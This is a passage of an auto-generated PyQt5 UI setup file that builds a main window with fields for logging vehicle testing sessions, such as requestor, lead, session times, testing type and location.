distribution\ndf['age'].value_counts()\nsns.distplot(df['age'],bins=8, kde=False)\n\n\n# In[6]:\n\n\n# see race dist, primarily white\ndf['race'].value_counts()\nsns.countplot(df['race'])\n\n\n# In[7]:\n\n\n# primarily private sector\ndf['workclass'].value_counts()\ncount = sns.countplot(df['workclass'])\n# set x axis size later\n\n\n# In[8]:\n\n\nfrom sklearn.model_selection import train_test_split,cross_val_score\n\n\n# In[9]:\n\n\n# map that we want to predict to a binary set of ints (0,1)\ndf['income_norm']=df['income'].map({'<=50K': 0, '>50K': 1, '<=50K.': 0, '>50K.': 1})\n#Numeric features\nnumeric_features = ['age','fnlwgt','education_num','capital_gain','capital_loss','hours_per_week','income_norm']\n#Categorical features\ncat_features = ['workclass','education','marital_status', 'occupation', 'relationship', 'race', 'sex', 'native']\n\n\n# In[10]:\n\n\nsns.countplot(df['income_norm'])\n# we see a large disparity in the data between # of entries\n\n\n# In[11]:\n\n\n# correlation matrix of features\nsns.heatmap(df[numeric_features].corr(), fmt='.2f',cmap='Accent',annot=True)\n\n\n# In[12]:\n\n\n# data cleaning\ndf['workclass'] = df['workclass'].fillna('X')\ndf['occupation'] = df['occupation'].fillna('X')\ndf['native_country'] = df['native_country'].fillna('United-States')\n#check to be sure we have no na\ndf.isnull().sum()\n\n\n# In[13]:\n\n\n#Feature engineering\ndf['sex'] = df['sex'].map({\"Male\":0,\"Female\":1})\n#df['sex'] = df['sex'].astype(int) # set column as type int\ndf.drop(labels=['education','occupation','workclass','fnlwgt','relationship','native_country','income','race','marital_status'], axis=1, inplace=True) \n# income is dropped as incorm_norm is used ^\n\n\n# In[14]:\n\n\ndf = df.dropna()\ny = df['income_norm'].values\nx = df.drop(labels=['income_norm'] ,axis=1) # income is the target\n#df.isnull().sum()\n# data splitting\nX_train,X_test, Y_train, Y_test = train_test_split(x,y,test_size=0.2,train_size=0.8,random_state = 42)\n\n\n# In[27]:\n\n\n# sklearn imports\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.naive_bayes import 
GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import SVC\n\n\n# In[17]:\n\n\nclassifiers = []\nclassifiers.append(LogisticRegression(solver='lbfgs'))\nclassifiers.append(KNeighborsClassifier())\nclassifiers.append(DecisionTreeClassifier())\nclassifiers.append(GaussianNB())\nclassifiers.append(RandomForestClassifier(n_estimators=100,max_features=3))\nclassifiers.append(SVC())\n\n\n# In[18]:\n\n\nX_train.head()\n\n\n# In[19]:\n\n\nresults=[]\nfor clf in classifiers:\n cross_val = cross_val_score(clf,X_train,Y_train,scoring='accuracy',cv=5,n_jobs=-1)\n results.append(cross_val)\n #print(\"Mean: \",cross_val.mean(),\"Standard Dev: \",cross_val.std()*2)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (cross_val.mean(), cross_val.std() * 2))\n" }, { "alpha_fraction": 0.7526881694793701, "alphanum_fraction": 0.7956989407539368, "avg_line_length": 30.33333396911621, "blob_id": "aba7d9a85b16c783694c0fbf8e0557e2b3ea6416", "content_id": "b9483f46770940e4e055a615cf5a415c324f107b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 93, "license_type": "no_license", "max_line_length": 69, "num_lines": 3, "path": "/readme.txt", "repo_name": "superg2009/comp3710AIProject", "src_encoding": "UTF-8", "text": "requires scikit-learn 0.19.2\n\nNo guarantee that the .py files work; I wrote this project with Jupyter" }, { "alpha_fraction": 0.6339198350906372, "alphanum_fraction": 0.6593353152275085, "avg_line_length": 18.907407760620117, "blob_id": "f0c059ca686aebdfbbe6774084a7514790aee404", "content_id": "1a34d67b73843d930812fad0285da86a1fe975a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2046, "license_type": "no_license", "max_line_length": 120, "num_lines": 108, "path": "/Graphing.py", "repo_name": "superg2009/comp3710AIProject", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[34]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n#get_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[46]:\n\n\n# name columns\nname_headers = ['age','workclass','fnlwgt','education','education_num',\n 'marital_status','occupation',\n 'relationship','race','sex','capital_gain',\n 'capital_loss','hours_per_week','native_country','income']\n# read data in\ndf=pd.read_csv(r'adult.csv',names=name_headers)\n\n\n# In[47]:\n\n\ndf = df.fillna(np.nan)\ndf = df.applymap(lambda x: np.nan if x=='?' 
else x)\nsns.set(color_codes=True)\n\n\n# In[48]:\n\n\n# map that we want to predict to a binary set of ints (0,1)\ndf['income_norm']=df['income'].map({'<=50K': 0, '>50K': 1, '<=50K.': 0, '>50K.': 1})\n#Numeric features\nnumeric_features = ['age','fnlwgt','education_num','capital_gain','capital_loss','hours_per_week','income_norm']\n#Categorical features\ncat_features = ['workclass','education','marital_status', 'occupation', 'relationship', 'race', 'sex', 'native_country']\n\n\n# In[49]:\n\n\nsns.countplot(df['sex'])\n\n\n# In[39]:\n\n\n#Feature engineering\ndf['sex'] = df['sex'].map({\"Male\":0,\"Female\":1})\n#df['sex'] = df['sex'].astype(int) # set column as type int\ndf = df.dropna()\n\n\n# In[40]:\n\n\n# correlation matrix of features\nsns.heatmap(df[numeric_features].corr(), fmt='.2f',cmap='Accent',annot=True)\n# low correlation outside of age,hours,capital gain,income\n\n\n# In[41]:\n\n\n# primarily private sector\ndf['workclass'].value_counts()\ncount = sns.countplot(df['workclass'])\n\n\n# In[42]:\n\n\n# see race dist, primarily white\ndf['race'].value_counts()\nsns.countplot(df['race'])\n\n\n# In[43]:\n\n\n#looking at age distribution\n#primarily middle age majority 20-50s\ndf['age'].value_counts()\nsns.distplot(df['age'],bins=8, kde=False)\n\n\n# In[44]:\n\n\nplt.figure(figsize=(10,5))\nchart = sns.countplot(df['marital_status'])\nchart.set_xticklabels(chart.get_xticklabels(),rotation=45)\n\n\n# In[45]:\n\n\nsns.distplot(df['sex'], kde=False)\n#sns.despine(bottom=True)\n\n\n# In[ ]:\n\n\n\n\n" } ]
3
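One thing worth noting about AIClassification.py above: it creates a hold-out split (`X_test`, `Y_test`) via `train_test_split`, but then only ever runs cross-validation on the training portion, so the hold-out set is never scored. A minimal sketch of how that final hold-out evaluation could look, assuming the variables defined in that script (`X_train`, `Y_train`, `X_test`, `Y_test`) are in scope; the choice of the random forest as the final model is illustrative, not something the original script does.

```python
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score

# fit one cross-validated candidate on the full training split,
# then score it exactly once on the untouched hold-out set
clf = RandomForestClassifier(n_estimators=100, max_features=3)
clf.fit(X_train, Y_train)
print("Hold-out accuracy: %0.2f" % accuracy_score(Y_test, clf.predict(X_test)))
```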
rjgpacheco/multi-threshold-optimization
https://github.com/rjgpacheco/multi-threshold-optimization
4039b7456182b6a7457a19d28db089fd25bf8946
328ce1eec814cd1631bd37000b76c087b2bfc1f7
2ea4ae0d3d6358c72394d08b289831f6b59540bd
refs/heads/master
2020-05-30T16:05:14.934887
2019-07-05T00:14:50
2019-07-05T00:14:50
189,838,476
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43815916776657104, "alphanum_fraction": 0.4688398838043213, "avg_line_length": 21.70833396911621, "blob_id": "ba7ead5bad690ca89bc6f8d59bff4e531a5ab883", "content_id": "a7e5809cb2bb17be79239006a0a7d47b906a7766", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 80, "num_lines": 48, "path": "/my_optimizer.py", "repo_name": "rjgpacheco/multi-threshold-optimization", "src_encoding": "UTF-8", "text": "import math\n\n\ndef calc_df(f, u, step=1e-6):\n # forward-difference approximation of the gradient of f at the point u\n d = []\n for i, _ in enumerate(u):\n v = [x for x in u]\n v[i] = v[i] + step\n derivative = (f(v) - f(u)) / step\n d.append(derivative)\n return d\n\n\ndef calc_diff(u, v):\n # Euclidean distance between two points given as lists\n if len(u) == 1:\n return abs(u[0] - v[0]) # compare the single components, not the lists\n acc = 0\n for a, b in zip(u, v):\n acc = acc + (b - a) ** 2\n return acc ** (1 / 2)\n\n\ndef find_minimum(f, x0, learning_rate=0.1, max_iterations=10000, tol=1e-6):\n # plain gradient descent: step against the numeric gradient until the\n # iterates move less than tol, or max_iterations is reached\n x = []\n df = []\n\n x.append(x0)\n df.append(math.inf)\n loop_counter = 0\n diff = math.inf\n while diff > tol:\n loop_counter = loop_counter + 1\n if loop_counter > max_iterations: # honour the argument, not a hard-coded limit\n break\n\n new_df = calc_df(f, x[-1])\n new_x = [x[-1][i] - learning_rate * new_df[i] for i in range(len(x[-1]))]\n\n df.append(new_df)\n x.append(new_x)\n\n diff = calc_diff(x[-2], x[-1])\n\n return {\n \"x\": x,\n \"df\": df,\n \"loop_counter\": loop_counter\n }" } ]
1
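A small usage sketch for `find_minimum` from my_optimizer.py above, assuming the module is importable from the repository root; the `bowl` objective and the starting point are illustrative assumptions, not part of the repository.

```python
from my_optimizer import find_minimum

# convex quadratic with a unique minimum at x = 3, y = -1
def bowl(v):
    return (v[0] - 3) ** 2 + (v[1] + 1) ** 2

result = find_minimum(bowl, [0.0, 0.0], learning_rate=0.1, tol=1e-6)
print(result["x"][-1])         # final iterate, close to [3.0, -1.0]
print(result["loop_counter"])  # iterations until the step fell below tol
```

With a learning rate of 0.1 and this objective (Hessian 2I), each step contracts the error by a factor of 0.8, so the iterates converge well before the default iteration cap.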
concordia-fsae/testing_doc_maker
https://github.com/concordia-fsae/testing_doc_maker
53962d71ee785e69831dc525eaf40a6b2997c1b3
578d8738acbbfd35d2f54f35ddbdc8804ebc4259
380a11d24329a23379918ff83dd57066b3dd5217
refs/heads/master
2022-01-24T21:19:55.236836
2019-08-16T00:16:12
2019-08-16T00:16:12
198,271,644
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7130706906318665, "alphanum_fraction": 0.723076581954956, "avg_line_length": 63.658226013183594, "blob_id": "3a94968341041aabbff420e126dbfecb3b4f8678", "content_id": "646c12584ce8450c82a39484bf4a866816b559fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45973, "license_type": "no_license", "max_line_length": 122, "num_lines": 711, "path": "/windows/homepage.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\homepage_export.ui'\n#\n# Created by: PyQt5 UI code generator 5.11.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(690, 716)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())\n MainWindow.setSizePolicy(sizePolicy)\n MainWindow.setMinimumSize(QtCore.QSize(647, 716))\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.main_tabs = QtWidgets.QTabWidget(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.main_tabs.sizePolicy().hasHeightForWidth())\n self.main_tabs.setSizePolicy(sizePolicy)\n self.main_tabs.setMinimumSize(QtCore.QSize(0, 500))\n self.main_tabs.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.main_tabs.setDocumentMode(False)\n self.main_tabs.setObjectName(\"main_tabs\")\n self.tab_main = QtWidgets.QWidget()\n self.tab_main.setObjectName(\"tab_main\")\n self.gridlayout = QtWidgets.QGridLayout(self.tab_main)\n self.gridlayout.setObjectName(\"gridlayout\")\n self.scroll_fields = QtWidgets.QScrollArea(self.tab_main)\n self.scroll_fields.setWidgetResizable(True)\n self.scroll_fields.setObjectName(\"scroll_fields\")\n self.scroll_fields_contents = QtWidgets.QWidget()\n self.scroll_fields_contents.setGeometry(QtCore.QRect(0, 0, 646, 551))\n self.scroll_fields_contents.setObjectName(\"scroll_fields_contents\")\n self.gridLayout_3 = QtWidgets.QGridLayout(self.scroll_fields_contents)\n self.gridLayout_3.setObjectName(\"gridLayout_3\")\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.gridLayout_3.addItem(spacerItem, 4, 0, 1, 1)\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.gridLayout_3.addItem(spacerItem1, 3, 1, 1, 1)\n self.label_general = QtWidgets.QLabel(self.scroll_fields_contents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_general.sizePolicy().hasHeightForWidth())\n self.label_general.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.label_general.setFont(font)\n 
self.label_general.setObjectName(\"label_general\")\n self.gridLayout_3.addWidget(self.label_general, 0, 0, 1, 1)\n self.fr_general_info = QtWidgets.QFrame(self.scroll_fields_contents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.fr_general_info.sizePolicy().hasHeightForWidth())\n self.fr_general_info.setSizePolicy(sizePolicy)\n self.fr_general_info.setFrameShape(QtWidgets.QFrame.Box)\n self.fr_general_info.setFrameShadow(QtWidgets.QFrame.Raised)\n self.fr_general_info.setLineWidth(1)\n self.fr_general_info.setObjectName(\"fr_general_info\")\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.fr_general_info)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.form_left_general = QtWidgets.QFormLayout()\n self.form_left_general.setContentsMargins(-1, 5, -1, -1)\n self.form_left_general.setObjectName(\"form_left_general\")\n self.label_requestor = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_requestor.sizePolicy().hasHeightForWidth())\n self.label_requestor.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_requestor.setFont(font)\n self.label_requestor.setObjectName(\"label_requestor\")\n self.form_left_general.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_requestor)\n self.edit_requestor = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_requestor.setEnabled(True)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_requestor.sizePolicy().hasHeightForWidth())\n self.edit_requestor.setSizePolicy(sizePolicy)\n self.edit_requestor.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_requestor.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.edit_requestor.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)\n self.edit_requestor.setAutoFillBackground(True)\n self.edit_requestor.setStyleSheet(\"\")\n self.edit_requestor.setInputMask(\"\")\n self.edit_requestor.setText(\"\")\n self.edit_requestor.setDragEnabled(False)\n self.edit_requestor.setClearButtonEnabled(True)\n self.edit_requestor.setObjectName(\"edit_requestor\")\n self.form_left_general.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.edit_requestor)\n self.label_lead = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_lead.sizePolicy().hasHeightForWidth())\n self.label_lead.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_lead.setFont(font)\n self.label_lead.setObjectName(\"label_lead\")\n self.form_left_general.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_lead)\n self.edit_lead = QtWidgets.QLineEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_lead.sizePolicy().hasHeightForWidth())\n 
self.edit_lead.setSizePolicy(sizePolicy)\n self.edit_lead.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_lead.setClearButtonEnabled(True)\n self.edit_lead.setObjectName(\"edit_lead\")\n self.form_left_general.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.edit_lead)\n self.label_attendee = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_attendee.sizePolicy().hasHeightForWidth())\n self.label_attendee.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_attendee.setFont(font)\n self.label_attendee.setObjectName(\"label_attendee\")\n self.form_left_general.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_attendee)\n self.btn_modify_attending = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_modify_attending.sizePolicy().hasHeightForWidth())\n self.btn_modify_attending.setSizePolicy(sizePolicy)\n self.btn_modify_attending.setObjectName(\"btn_modify_attending\")\n self.form_left_general.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.btn_modify_attending)\n self.label_session_date = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_date.sizePolicy().hasHeightForWidth())\n self.label_session_date.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_date.setFont(font)\n self.label_session_date.setObjectName(\"label_session_date\")\n self.form_left_general.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_session_date)\n self.label_session_st = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_st.sizePolicy().hasHeightForWidth())\n self.label_session_st.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_st.setFont(font)\n self.label_session_st.setObjectName(\"label_session_st\")\n self.form_left_general.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_session_st)\n self.time_start = QtWidgets.QTimeEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.time_start.sizePolicy().hasHeightForWidth())\n self.time_start.setSizePolicy(sizePolicy)\n self.time_start.setMaximumSize(QtCore.QSize(70, 16777215))\n self.time_start.setObjectName(\"time_start\")\n self.form_left_general.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.time_start)\n self.label_session_et = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_et.sizePolicy().hasHeightForWidth())\n 
self.label_session_et.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_et.setFont(font)\n self.label_session_et.setObjectName(\"label_session_et\")\n self.form_left_general.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_session_et)\n self.time_end = QtWidgets.QTimeEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.time_end.sizePolicy().hasHeightForWidth())\n self.time_end.setSizePolicy(sizePolicy)\n self.time_end.setMaximumSize(QtCore.QSize(70, 16777215))\n self.time_end.setTime(QtCore.QTime(1, 0, 0))\n self.time_end.setObjectName(\"time_end\")\n self.form_left_general.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.time_end)\n self.label_testing_type = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_testing_type.sizePolicy().hasHeightForWidth())\n self.label_testing_type.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_testing_type.setFont(font)\n self.label_testing_type.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_testing_type.setObjectName(\"label_testing_type\")\n self.form_left_general.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_testing_type)\n self.layout_type = QtWidgets.QVBoxLayout()\n self.layout_type.setObjectName(\"layout_type\")\n self.radio_dyno = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_dyno.sizePolicy().hasHeightForWidth())\n self.radio_dyno.setSizePolicy(sizePolicy)\n self.radio_dyno.setObjectName(\"radio_dyno\")\n self.radio_type = QtWidgets.QButtonGroup(MainWindow)\n self.radio_type.setObjectName(\"radio_type\")\n self.radio_type.addButton(self.radio_dyno)\n self.layout_type.addWidget(self.radio_dyno)\n self.radio_track = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_track.sizePolicy().hasHeightForWidth())\n self.radio_track.setSizePolicy(sizePolicy)\n self.radio_track.setObjectName(\"radio_track\")\n self.radio_type.addButton(self.radio_track)\n self.layout_type.addWidget(self.radio_track)\n self.layout_type_other = QtWidgets.QHBoxLayout()\n self.layout_type_other.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\n self.layout_type_other.setObjectName(\"layout_type_other\")\n self.radio_type_other = QtWidgets.QRadioButton(self.fr_general_info)\n self.radio_type_other.setText(\"\")\n self.radio_type_other.setChecked(False)\n self.radio_type_other.setAutoExclusive(True)\n self.radio_type_other.setObjectName(\"radio_type_other\")\n self.radio_type.addButton(self.radio_type_other)\n self.layout_type_other.addWidget(self.radio_type_other)\n self.edit_type_other = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_type_other.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, 
QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_type_other.sizePolicy().hasHeightForWidth())\n self.edit_type_other.setSizePolicy(sizePolicy)\n self.edit_type_other.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_type_other.setStyleSheet(\"\")\n self.edit_type_other.setText(\"\")\n self.edit_type_other.setReadOnly(False)\n self.edit_type_other.setClearButtonEnabled(True)\n self.edit_type_other.setObjectName(\"edit_type_other\")\n self.layout_type_other.addWidget(self.edit_type_other)\n self.layout_type.addLayout(self.layout_type_other)\n self.form_left_general.setLayout(6, QtWidgets.QFormLayout.FieldRole, self.layout_type)\n self.label_session_loc = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_loc.sizePolicy().hasHeightForWidth())\n self.label_session_loc.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_loc.setFont(font)\n self.label_session_loc.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_session_loc.setObjectName(\"label_session_loc\")\n self.form_left_general.setWidget(7, QtWidgets.QFormLayout.LabelRole, self.label_session_loc)\n self.layout_loc = QtWidgets.QVBoxLayout()\n self.layout_loc.setObjectName(\"layout_loc\")\n self.radio_loc_cage = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_loc_cage.sizePolicy().hasHeightForWidth())\n self.radio_loc_cage.setSizePolicy(sizePolicy)\n self.radio_loc_cage.setObjectName(\"radio_loc_cage\")\n self.radio_loc = QtWidgets.QButtonGroup(MainWindow)\n self.radio_loc.setObjectName(\"radio_loc\")\n self.radio_loc.addButton(self.radio_loc_cage)\n self.layout_loc.addWidget(self.radio_loc_cage)\n self.radio_loc_loading = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_loc_loading.sizePolicy().hasHeightForWidth())\n self.radio_loc_loading.setSizePolicy(sizePolicy)\n self.radio_loc_loading.setObjectName(\"radio_loc_loading\")\n self.radio_loc.addButton(self.radio_loc_loading)\n self.layout_loc.addWidget(self.radio_loc_loading)\n self.radio_loc_casino = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_loc_casino.sizePolicy().hasHeightForWidth())\n self.radio_loc_casino.setSizePolicy(sizePolicy)\n self.radio_loc_casino.setObjectName(\"radio_loc_casino\")\n self.radio_loc.addButton(self.radio_loc_casino)\n self.layout_loc.addWidget(self.radio_loc_casino)\n self.layout_loc_other = QtWidgets.QHBoxLayout()\n self.layout_loc_other.setObjectName(\"layout_loc_other\")\n self.radio_loc_other = QtWidgets.QRadioButton(self.fr_general_info)\n self.radio_loc_other.setText(\"\")\n self.radio_loc_other.setObjectName(\"radio_loc_other\")\n 
self.radio_loc.addButton(self.radio_loc_other)\n self.layout_loc_other.addWidget(self.radio_loc_other)\n self.edit_loc_other = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_loc_other.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_loc_other.sizePolicy().hasHeightForWidth())\n self.edit_loc_other.setSizePolicy(sizePolicy)\n self.edit_loc_other.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_loc_other.setStyleSheet(\"\")\n self.edit_loc_other.setText(\"\")\n self.edit_loc_other.setReadOnly(False)\n self.edit_loc_other.setClearButtonEnabled(True)\n self.edit_loc_other.setObjectName(\"edit_loc_other\")\n self.layout_loc_other.addWidget(self.edit_loc_other)\n self.layout_loc.addLayout(self.layout_loc_other)\n self.form_left_general.setLayout(7, QtWidgets.QFormLayout.FieldRole, 